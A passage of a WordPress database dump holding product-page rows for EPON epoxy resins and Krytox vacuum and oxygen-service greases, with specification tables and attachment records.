width="175">\n<p align="center">ASTM D1652</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Viscosity at 25°C</td>\n<td valign="top" width="72">\n<p align="center">P</p>\n</td>\n<td valign="top" width="132">\n<p align="center">50 – 65</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D445</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Color</td>\n<td valign="top" width="72">\n<p align="center">Gardner</p>\n</td>\n<td valign="top" width="132">\n<p align="center">1 max.</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D1544</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">&nbsp;</td>\n<td valign="top" width="72">\n<p align="center"></p>\n</td>\n<td valign="top" width="132">\n<p align="center"></p>\n</td>\n<td valign="top" width="175">\n<p align="center"></p>\n</td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n\n<span style="text-decoration: underline;"><strong>Typical Properties</strong></span>\n<table border="1" cellspacing="0" cellpadding="3">\n<tbody>\n<tr>\n<td valign="top" width="211">Property</td>\n<td valign="top" width="72">\n<p align="center">Units</p>\n</td>\n<td valign="top" width="132">\n<p align="center">Value</p>\n</td>\n<td valign="top" width="175">\n<p align="center">Test Method/Standard</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Density at 25°C</td>\n<td valign="top" width="72">\n<p align="center">lb/gal</p>\n</td>\n<td valign="top" width="132">\n<p align="center">9.7 – 9.8</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D1475</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Saponifiable chloride</td>\n<td valign="top" width="72">\n<p align="center">% wt.</p>\n</td>\n<td valign="top" width="132">\n<p align="center"><span class="GramE">0.03 max.</span></p>\n</td>\n<td valign="top" width="175">\n<p align="center"></p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Sodium <sup>1</sup></td>\n<td valign="top" width="72">\n<p align="center">ppm</p>\n</td>\n<td valign="top" width="132">\n<p align="center"><span class="GramE">2 max.</span></p>\n</td>\n<td valign="top" width="175">\n<p align="center"></p>\n</td>\n</tr>\n</tbody>\n</table>', 'EPON™ 825', 'EPON™ Resin 825 is a high purity bisphenol A epichlorohydrin epoxy resin. As a result, the viscosity of this product is lower than standard bisphenol A liquid resins without the use of diluents or modifiers. Resin/curing agent systems based on EPON 825 have greater clarity, chemical resistance, higher heat distortion temperature, and lower electrical conductivity than can be obtained with most other standard resins. Benefits include:\n<ul>\n 	<li>Low viscosity</li>\n 	<li>Low color</li>\n 	<li>Reacts with a full range of curing agents</li>\n 	<li>Produces high-strength cured systems resistant to chemical attack</li>\n</ul>', 'inherit', 'closed', 'closed', '', '842-autosave-v1', '', '', '2016-10-31 15:36:09', '2016-10-31 15:36:09', '', 842, 'https://132.148.10.86/wordpress/842-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (859, 2, '2016-08-26 12:55:03', '2016-08-26 12:55:03', '', 'shutterstock_396576940', '', 'inherit', 'open', 'closed', '', 'shutterstock_396576940', '', '', '2016-08-26 12:55:03', '2016-08-26 12:55:03', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_396576940.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (860, 3, '2016-08-26 12:55:12', '2016-08-26 12:55:12', '', '825', '', 'inherit', 'open', 'closed', '', '825', '', '', '2016-08-26 12:55:12', '2016-08-26 12:55:12', '', 842, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/825.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (861, 3, '2016-08-26 14:00:37', '2016-08-26 14:00:37', 'EPON 826 is a low viscosity, light colored liquid bisphenol A based epoxy resin. It finds use in a variety of applications (coatings and composites) when crosslinked or hardened with appropriate curing agents. Miller-Stephenson is a certified EPON 826 Supplier and the Benefits of EPON 826 include:\r\n<ul>\r\n 	<li>Low viscosity</li>\r\n 	<li>Low color</li>\r\n 	<li>Low ionic contamination</li>\r\n 	<li>Reacts with a full range of curing agents</li>\r\n 	<li>Produces high-strength cured systems resistant to chemical attack</li>\r\n</ul>\r\nEPON 826 is commonly used to fabricate high strength fiber reinforced pipes and composites. The low viscosity of the resin provides rapid wetout of a wide range of reinforcing fibers including glass, graphite, aramid and boron. High fiber content with low void content can be achieved with this resin. Structural composites such as this have a high ratio of strength to weight. This makes them suitable for applications ranging from sporting goods equipment to aerospace structural members.\r\n\r\nEPON Resin 826 systems are also excellent electrical insulators. Such systems are used frequently in electrical encapsulations, laminates and molding compounds.Structures, linings and coatings made with EPON Resin 826 protect metal surfaces and resist attack from acids, bases, solvents and fuel. They find use in the oil, gas, mining and chemical industries.The higher shear strength obtained with EPON Resin 826 adhesives is due in part to the low internal stresses inherent in cured epoxy resins. Such adhesives are used to bond a broad range of substrates<span class="GramE">..</span>\r\n\r\n<strong>Application</strong>\r\n\r\nEPON liquid epoxy resins when properly formulated and cured provide an inert end-product with a unique combination of properties. They are suitable for use in high performance applications such as coatings, adhesives, civil engineering, electronic and electrical insulation, composites and fiber sizing. Cured EPON resins are generally regarded as being high strength materials, since many commonly used systems provide tensile strengths greater than 10,000 psi and modulus values greater than 400,000 psi\r\n\r\nMiller-Stephenson is an Epon 826 Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. . <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>\r\n\r\n&nbsp;', 'EPON™ 826', 'EPON™ Resin 826 is a low viscosity, light colored liquid bisphenol A based epoxy resin. It finds use in a variety of applications (coatings and composites) when crosslinked or hardened with appropriate curing agents. Benefits include:\r\n<ul>\r\n 	<li>Low viscosity</li>\r\n 	<li>Low color</li>\r\n 	<li>Low ionic contamination</li>\r\n 	<li>Reacts with a full range of curing agents</li>\r\n 	<li>Produces high-strength cured systems resistant to chemical attack</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-826', '', '', '2016-11-23 19:39:47', '2016-11-23 19:39:47', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=861', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (862, 2, '2016-08-26 13:32:21', '2016-08-26 13:32:21', '<h2>Krytox LVP - High-Vacuum Grease</h2>\r\nKrytox LVP high-vacuum grease performs over extremes of temperature and pressure that hydrocarbon, silicone, and chlorofluorocarbon greases can’t match. From –15–300°C (0–570°F), at vapor pressures as low as 10–13 mmHg, and in even the most chemically severe environments, Krytox® LVP grease gives dependable, proven performance.\r\n\r\n<img class=" wp-image-4751 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-lvp-grease-properties-1.jpg" alt="krytox-lvp-grease-properties" width="426" height="580" />\r\n\r\nAdditionally, Krytox high-vacuum grease is non-flammable, insoluble, and chemically inert. It is also an excellent lubricant and sealant. And Krytox LVP grease offers all these features at a price that is less expensive than many hydrocarbons, silicone, and chlorofluorocarbon greases. Krytox LVP high-vacuum grease is used as a sealant or lubricant in vacuum systems. Chemically inert and offering superior lubrication properties, LVP grease combines the extremely low vapor pressure of Krytox fluorinated oil, which is based on the most stable type of perfluoroalkylpolyether available, with a fluorocarbon thickener.\r\n\r\nThus, Krytox LVP grease will not explode, ignite, decompose, react to form gummy or solid deposits or act as fuel for fires. Krytox® grease retains its lubricating ability at temperature extremes ranging from –15–300°C (0–570°F) and offers complete oxidation resistance. All these features add up to lower wear and longer life for equipment and components—so important when access for component repair or replacement is difficult or impossible.\r\n\r\n&nbsp;\r\n\r\n<strong>Nonflammable</strong>\r\n\r\nToday, Krytox products are proven performers that are setting the industry standard for safety, reliability, and cost-effectiveness.\r\n\r\nKrytox LVP grease is nonflammable under all conditions likely to be encountered in service. It shows no autogenous ignition, flash, or fire points up to the highest temperature tested, 649°C\r\n(1200°F), in standard ASTM tests.\r\n\r\n<strong>Compatible with Oxygen</strong>\r\n\r\nAt elevated temperatures and pressures, Krytox LVP high-vacuum grease is highly resistant to attack by gaseous and liquid oxygen. As a result, it is the lubricant of choice in industries that manufacture or use oxygen. Tests confirming the non-reactivity of Krytox™ lubricants with oxygen were performed at a variety of conditions.', 'Krytox LVP', 'Low pressures. Extremely high or low temperatures. Hostile environments. Whatever special needs your system might have, Krytox low vapor pressure (LVP) high-vacuum grease works—safely, reliably, and cost effectively.\r\n\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-lvp', '', '', '2017-08-17 19:58:02', '2017-08-17 19:58:02', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=862', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (863, 2, '2016-08-26 13:39:09', '2016-08-26 13:39:09', '', 'Krytox LVP', '', 'inherit', 'open', 'closed', '', 'shutterstock_22381852', '', '', '2016-10-03 14:46:26', '2016-10-03 14:46:26', '', 862, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_22381852.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (864, 2, '2017-08-17 19:57:43', '2017-08-17 19:57:43', '<h2>Krytox LVP - High-Vacuum Grease</h2>\nKrytox LVP high-vacuum grease performs over extremes of temperature and pressure that hydrocarbon, silicone, and chlorofluorocarbon greases can’t match. From –15–300°C (0–570°F), at vapor pressures as low as 10–13 mmHg, and in even the most chemically severe environments, Krytox® LVP grease gives dependable, proven performance.\n\n<img class=" wp-image-4751 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-lvp-grease-properties-1.jpg" alt="krytox-lvp-grease-properties" width="426" height="580" />\n\nAdditionally, Krytox high-vacuum grease is non-flammable, insoluble, and chemically inert. It is also an excellent lubricant and sealant. And Krytox LVP grease offers all these features at a price that is less expensive than many hydrocarbons, silicone, and chlorofluorocarbon greases. Krytox LVP high-vacuum grease is used as a sealant or lubricant in vacuum systems. Chemically inert and offering superior lubrication properties, LVP grease combines the extremely low vapor pressure of Krytox fluorinated oil, which is based on the most stable type of perfluoroalkylpolyether available, with a fluorocarbon thickener.\n\nThus, Krytox LVP grease will not explode, ignite, decompose, react to form gummy or solid deposits or act as fuel for fires. Krytox® grease retains its lubricating ability at temperature extremes ranging from –15–300°C (0–570°F) and offers complete oxidation resistance. All these features add up to lower wear and longer life for equipment and components—so important when access for component repair or replacement is difficult or impossible.\n\n&nbsp;\n\n<strong>Nonflammable</strong>\n\nToday, Krytox products are proven performers that are setting the industry standard for safety, reliability, and cost-effectiveness.\n\nKrytox LVP grease is nonflammable under all conditions likely to be encountered in service. It shows no autogenous ignition, flash, or fire points up to the highest temperature tested, 649°C\n(1200°F), in standard ASTM tests.\n\n<strong>Compatible with Oxygen</strong>\n\nAt elevated temperatures and pressures, Krytox LVP high-vacuum grease is highly resistant to attack by gaseous and liquid oxygen. As a result, it is the lubricant of choice in industries that manufacture or use oxygen. Tests confirming the non-reactivity of Krytox™ lubricants with oxygen were performed at a variety of conditions.', 'Krytox LVP', 'Low pressures. Extremely high or low temperatures. Hostile environments. Whatever special needs your system might have, Krytox low vapor pressure (LVP) high-vacuum grease works—safely, reliably, and cost effectively.\n\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '862-autosave-v1', '', '', '2017-08-17 19:57:43', '2017-08-17 19:57:43', '', 862, 'https://132.148.10.86/wordpress/862-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (865, 3, '2016-08-26 14:00:21', '2016-08-26 14:00:21', '', '826', '', 'inherit', 'open', 'closed', '', '826', '', '', '2016-08-26 14:00:21', '2016-08-26 14:00:21', '', 861, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/826.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (866, 3, '2016-08-26 14:04:25', '2016-08-26 14:04:25', '', 'curing agent overview new', '', 'inherit', 'open', 'closed', '', 'curing-agent-overview-new', '', '', '2016-08-26 14:04:25', '2016-08-26 14:04:25', '', 861, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/curing-agent-overview-new.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (867, 1, '2016-08-26 14:07:03', '2016-08-26 14:07:03', '', 'vazo_banner', '', 'inherit', 'open', 'closed', '', 'vazo_banner', '', '', '2016-08-26 14:07:03', '2016-08-26 14:07:03', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/vazo_banner.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (868, 2, '2016-08-26 15:03:50', '2016-08-26 15:03:50', 'The NRT 8900 series of Krytox oils and greases deliver nonreactive, nonflammable, long-lasting performance, even under the demanding temperatures and pressures of reactive gas service. Krytox NRT lubricants are compatible with oxygen and other reactive chemicals, and are extremely resistant to water washout. Krytox NRT lubricants are also compatible with polymers used in seals, O-rings, and valves. \r\n\r\nKrytox greases in the NRT 8900 series have been specially formulated for reactive gas service. With Krytox base oil, the NRT greases have special thickeners and additives for use with reactive gas or chemical applications.\r\n\r\nThe superior film-forming capability of Krytox lubricants provide a thick oil layer that reduces friction and wear, extending equipment life in severe duty applications. The non-oxidizing nature of the oils makes the greases last longer. The oils don’t gum up as they age; so, they won’t harden the greases and cause catastrophic failure. Krytox oils and greases are perfluoropolyether (PFPE) lubricants—also called perfluoroalkylether (PFAE) or perfluoropolyalkylether (PFPAE). Many of the NRT series of Krytox greases are thickened with a unique polytetrafluoroethylene (PTFE) with the formula (CF2-CF2)n. This special high efficiency thickener has a melting point of 325 °C (617 °F), low molecular weight, and submicron (0.2 μm) particle size.\r\n\r\nAll NRT oils and greases have been tested by West German Federal Institute for Materials Testing (BAM). All NRT oils and greases have been tested by West German Federal Institute for Materials Testing (BAM). Chemours lubricants have been used in oxygen and reactive gas service for decades. Krytox lubricants have been independently tested by organizations, including BOC, Air Liquide, NASA, General Dynamics, and Praxair, and proven acceptable for oxygen and other reactive chemical compatibility.\r\n\r\nKrytox NRT 8900 grease has been formulated for use in cold to ambient conditions, and is recommended as a cost-effective valve packing and seal lubricant for O-rings', 'NRT 8900', 'Krytox NRT 8900 grease has been formulated for use in cold to ambient conditions, and is recommended as a cost-effective valve packing and seal lubricant for O-rings.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-nrt-8900', '', '', '2016-10-04 18:59:28', '2016-10-04 18:59:28', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=868', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (869, 2, '2016-08-26 14:54:47', '2016-08-26 14:54:47', '', 'NRT8908', '', 'inherit', 'open', 'closed', '', 'nrt8908', '', '', '2016-08-26 14:54:47', '2016-08-26 14:54:47', '', 868, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/NRT8908.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (870, 2, '2016-08-26 14:54:49', '2016-08-26 14:54:49', '', 'NRTgrease', '', 'inherit', 'open', 'closed', '', 'nrtgrease', '', '', '2016-08-26 14:54:49', '2016-08-26 14:54:49', '', 868, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/NRTgrease.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (871, 2, '2016-08-26 15:01:39', '2016-08-26 15:01:39', '', 'shutterstock_18414949', '', 'inherit', 'open', 'closed', '', 'shutterstock_18414949', '', '', '2016-08-26 15:01:39', '2016-08-26 15:01:39', '', 868, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_18414949.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (872, 2, '2016-08-26 15:01:49', '2016-08-26 15:01:49', '', 'Krytox NRT 8900', '', 'inherit', 'open', 'closed', '', 'shutterstock_60087109', '', '', '2016-10-03 15:30:45', '2016-10-03 15:30:45', '', 868, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_60087109.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (873, 2, '2016-08-26 15:01:59', '2016-08-26 15:01:59', '', 'shutterstock_240925363', '', 'inherit', 'open', 'closed', '', 'shutterstock_240925363', '', '', '2016-08-26 15:01:59', '2016-08-26 15:01:59', '', 868, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_240925363.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (874, 2, '2016-08-26 15:02:25', '2016-08-26 15:02:25', '', 'Krytox NRT PLSS', '', 'inherit', 'open', 'closed', '', 'shutterstock_274873175', '', '', '2016-10-03 15:13:51', '2016-10-03 15:13:51', '', 868, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_274873175.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (875, 2, '2016-08-26 15:02:42', '2016-08-26 15:02:42', '', 'Krytox NRT 8904', '', 'inherit', 'open', 'closed', '', 'shutterstock_315050906', '', '', '2016-10-04 19:01:23', '2016-10-04 19:01:23', '', 868, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_315050906.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (876, 2, '2016-08-26 15:02:57', '2016-08-26 15:02:57', '', 'Krytox NRT 8906', '', 'inherit', 'open', 'closed', '', 'shutterstock_414620641', '', '', '2016-10-04 19:06:14', '2016-10-04 19:06:14', '', 868, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_414620641.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (877, 3, '2016-08-26 15:20:29', '2016-08-26 15:20:29', 'EPON 828 resin is an undiluted clear difunctional bisphenol A/epichlorohydrin derived liquid epoxy resin. When cross-linked or hardened with appropriate curing agents, very good mechanical, adhesive, dielectric and chemical resistance properties are obtained. Because of this versatility, EPON Resin 828 has become a standard epoxy resin used in formulation, fabrication and fusion technology. Miller-Stephenson is certified EPON 828 supplier and EPON 828 benefits include:\r\n<ul>\r\n 	<li>Fiber reinforced pipes, tanks and composites</li>\r\n 	<li>Tooling, casting and molding compounds</li>\r\n 	<li>Construction, electrical and aerospace adhesives</li>\r\n 	<li>High solids/low VOC maintenance and marine coatings</li>\r\n 	<li>Electrical encapsulations and laminates</li>\r\n 	<li>Chemical resistant tank linings, flooring and grouts</li>\r\n 	<li>Base resin for epoxy fusion technology</li>\r\n</ul>\r\nEPON™ Difunctional Liquid Epoxy Resin are the most important products sold in the epoxy resin market, and one of the foundations of Hexion. The basis of the product line is EPON Resin 828, which is a liquid resin also described as diglycidyl ether of Bisphenol A. This key resin is complemented in the range by EPON Resin 862, the diglycidyl ether of Bisphenol F, and a full series of modified liquid epoxy resins, epoxy resin blends and purified epoxy resins.\r\n\r\n<strong>General Information</strong>\r\n\r\nThe low viscosity and cure properties of EPON Resin 828 allow its use under various application and fabrication techniques including:\r\n<table border="1" cellspacing="0" cellpadding="0">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="271">\r\n<ul type="disc">\r\n 	<li>Spraying and brushing</li>\r\n</ul>\r\n</td>\r\n<td valign="top" width="271">\r\n<ul type="disc">\r\n 	<li>Pultrusion</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="271">\r\n<ul type="disc">\r\n 	<li>Filament winding</li>\r\n</ul>\r\n</td>\r\n<td valign="top" width="271">\r\n<ul type="disc">\r\n 	<li>Casting</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="271">\r\n<ul type="disc">\r\n 	<li>Pressure laminating</li>\r\n</ul>\r\n</td>\r\n<td valign="top" width="271">\r\n<ul type="disc">\r\n 	<li>Molding</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="271">\r\n<ul type="disc">\r\n 	<li>Vacuum bag laminating</li>\r\n</ul>\r\n</td>\r\n<td valign="top" width="271">\r\n<ul type="disc">\r\n 	<li>Toweling</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Application</strong>\r\n\r\nEPON liquid epoxy resins when properly formulated and cured provide an inert end-product with a unique combination of properties. They are suitable for use in high performance applications such as coatings, adhesives, civil engineering, electronic and electrical insulation, composites and fiber sizing. Cured EPON resins are generally regarded as being high strength materials, since many commonly used systems provide tensile strengths greater than 10,000 psi and modulus values greater than 400,000 psi. One of the most widely recognized applications of cured EPON Resin 828 is strong adhesion to a broad range of substrates. Such systems exhibit shear strength of up to 6,000 psi (41 Mpa). One factor which contributes to this property is the low shrinkage shown by these systems during cure. Compared to other polymers, epoxy resins have low internal stresses resulting in strong and durable finished products.\r\n\r\nMiller-Stephenson is an Epon 828 Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>', 'EPON™ 828', 'EPON™ Resin 828 is an undiluted clear difunctional bisphenol A/epichlorohydrin derived liquid epoxy resin. When cross-linked or hardened with appropriate curing agents, very good mechanical, adhesive, dielectric and chemical resistance properties are obtained. Because of this versatility, EPON Resin 828 has become a standard epoxy resin used in formulation, fabrication and fusion technology. Benefits include:\r\n<ul>\r\n 	<li>Fiber reinforced pipes, tanks and composites</li>\r\n 	<li>Tooling, casting and molding compounds</li>\r\n 	<li>Construction, electrical and aerospace adhesives</li>\r\n 	<li>High solids/low VOC maintenance and marine coatings</li>\r\n 	<li>Electrical encapsulations and laminates</li>\r\n 	<li>Chemical resistant tank linings, flooring and grouts</li>\r\n 	<li>Base resin for epoxy fusion technology</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-828', '', '', '2016-11-23 19:37:06', '2016-11-23 19:37:06', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=877', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (878, 2, '2016-08-26 15:18:50', '2016-08-26 15:18:50', 'The Krytox NRT 8904 series of Krytox oils and greases deliver nonreactive, nonflammable, long-lasting performance, even under the demanding temperatures and pressures of reactive gas service. Krytox NRT lubricants are compatible with oxygen and other reactive chemicals, and are extremely resistant to water washout. Krytox NRT lubricants are also compatible with polymers used in seals, O-rings, and valves. \r\n\r\nKrytox NRT 8904 and NRT 8906 provide excellent lubrication options for valves, regulators, seals, and pump and motor bearings at a wide range of operating conditions.\r\n\r\nThe superior film-forming capability of Krytox lubricants provide a thick oil layer that reduces friction and wear, extending equipment life in severe duty applications. The non-oxidizing nature of the oils makes the greases last longer. The oils don’t gum up as they age; so, they won’t harden the greases and cause catastrophic failure. Krytox oils and greases are perfluoropolyether (PFPE) lubricants—also called perfluoroalkylether (PFAE) or perfluoropolyalkylether (PFPAE). Many of the NRT series of Krytox greases are thickened with a unique polytetrafluoroethylene (PTFE) with the formula (CF2-CF2)n. This special high efficiency thickener has a melting point of 325 °C (617 °F), low molecular weight, and submicron (0.2 μm) particle size.\r\n\r\nAll NRT oils and greases have been tested by West German Federal Institute for Materials Testing (BAM). All NRT oils and greases have been tested by West German Federal Institute for Materials Testing (BAM). Chemours lubricants have been used in oxygen and reactive gas service for decades. Krytox lubricants have been independently tested by organizations, including BOC, Air Liquide, NASA, General Dynamics, and Praxair, and proven acceptable for oxygen and other reactive chemical compatibility.\r\n\r\nKrytox NRT 8904 grease has been formulated for use in cold to ambient conditions, and is recommended as a cost-effective valve packing and seal lubricant for O-rings.       \r\n', 'NRT 8904', 'Krytox NRT 8904 and 8906 provide excellent lubrication options for valves, regulators, seals, and pump and motor bearings at a wide range of operating conditions.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-nrt-8904', '', '', '2016-10-04 19:03:00', '2016-10-04 19:03:00', '', 0, 'https://132.148.10.86/wordpress/product/nrt-8904/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (879, 3, '2016-08-26 15:19:28', '2016-08-26 15:19:28', '', '828', '', 'inherit', 'open', 'closed', '', '828', '', '', '2016-08-26 15:19:28', '2016-08-26 15:19:28', '', 877, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/828.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (880, 2, '2016-08-26 15:19:34', '2016-08-26 15:19:34', 'The Krytox NRT 8906 series of Krytox oils and greases deliver nonreactive, nonflammable, long-lasting performance, even under the demanding temperatures and pressures of reactive gas service. Krytox NRT lubricants are compatible with oxygen and other reactive chemicals, and are extremely resistant to water washout. Krytox NRT lubricants are also compatible with polymers used in seals, O-rings, and valves. \r\n\r\nGreases in the Krytox NRT 8906 series have been specially formulated for reactive gas service. With Krytox base oil, the NRT greases have special thickeners and additives for use with reactive gas or chemical applications.\r\n\r\nThe superior film-forming capability of Krytox lubricants provide a thick oil layer that reduces friction and wear, extending equipment life in severe duty applications. The non-oxidizing nature of the oils makes the greases last longer. The oils don’t gum up as they age; so, they won’t harden the greases and cause catastrophic failure. Krytox oils and greases are perfluoropolyether (PFPE) lubricants—also called perfluoroalkylether (PFAE) or perfluoropolyalkylether (PFPAE). Many of the NRT series of Krytox greases are thickened with a unique polytetrafluoroethylene (PTFE) with the formula (CF2-CF2)n. This special high efficiency thickener has a melting point of 325 °C (617 °F), low molecular weight, and submicron (0.2 μm) particle size.\r\n\r\nAll Krytox NRT oils and greases have been tested by West German Federal Institute for Materials Testing (BAM). All NRT oils and greases have been tested by West German Federal Institute for Materials Testing (BAM). Chemours lubricants have been used in oxygen and reactive gas service for decades. Krytox lubricants have been independently tested by organizations, including BOC, Air Liquide, NASA, General Dynamics, and Praxair, and proven acceptable for oxygen and other reactive chemical compatibility.\r\n\r\nKrytox NRT 8906 provide excellent lubrication options for valves, regulators, seals, and pump and motor bearings at a wide range of operating conditions.\r\n', 'NRT 8906', 'Krytox NRT 8904 and 8906 provide excellent lubrication options for valves, regulators, seals, and pump and motor bearings at a wide range of operating conditions.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-nrt-8906', '', '', '2016-10-04 19:21:13', '2016-10-04 19:21:13', '', 0, 'https://132.148.10.86/wordpress/product/nrt-8906/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (881, 2, '2016-08-26 15:20:48', '2016-08-26 15:20:48', 'The Krytox NRT 8908 series of Krytox oils and greases deliver nonreactive, nonflammable, long-lasting performance, even under the demanding temperatures and pressures of reactive gas service. Krytox NRT lubricants are compatible with oxygen and other reactive chemicals, and are extremely resistant to water washout. Krytox NRT lubricants are also compatible with polymers used in seals, O-rings, and valves. \r\n\r\nGreases in the Krytox NRT 8908 series have been specially formulated for reactive gas service. With Krytox base oil, the NRT greases have special thickeners and additives for use with reactive gas or chemical applications.\r\n\r\nThe superior film-forming capability of Krytox lubricants provide a thick oil layer that reduces friction and wear, extending equipment life in severe duty applications. The non-oxidizing nature of the oils makes the greases last longer. The oils don’t gum up as they age; so, they won’t harden the greases and cause catastrophic failure. Krytox oils and greases are perfluoropolyether (PFPE) lubricants—also called perfluoroalkylether (PFAE) or perfluoropolyalkylether (PFPAE). Many of the NRT series of Krytox greases are thickened with a unique polytetrafluoroethylene (PTFE) with the formula (CF2-CF2)n. This special high efficiency thickener has a melting point of 325 °C (617 °F), low molecular weight, and submicron (0.2 μm) particle size.\r\n\r\nAll NRT oils and greases have been tested by West German Federal Institute for Materials Testing (BAM). All NRT oils and greases have been tested by West German Federal Institute for Materials Testing (BAM). Chemours lubricants have been used in oxygen and reactive gas service for decades. Krytox lubricants have been independently tested by organizations, including BOC, Air Liquide, NASA, General Dynamics, and Praxair, and proven acceptable for oxygen and other reactive chemical compatibility.\r\n\r\nKrytox™ NRT 8908 grease is a special high-pressure oxygen paste with excellent lubrication over a broad temperature range. This product has been formulated with special oils and thickeners for use in the high pressure oxygen industry. Krytox™ NRT 8908 received a rating of 350 bar at 60 °C (140 °F) in the BAM oxygen reactivity test, making it a great choice for valves in high\r\npressure service.', 'NRT 8908', 'Krytox NRT 8908 grease is a special high-pressure oxygen paste with excellent lubrication over a broad temperature range. This product has been formulated with special oils and thickeners for use in the high-pressure oxygen industry. Krytox NRT 8908 received a rating of 350 bar at 60°C in the BAM oxygen reactivity test, making it a great choice for valves in high pressure service.\r\n\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-nrt-8908', '', '', '2016-10-04 19:23:57', '2016-10-04 19:23:57', '', 0, 'https://132.148.10.86/wordpress/product/nrt-8908/', 0, 'product', '', 0); 
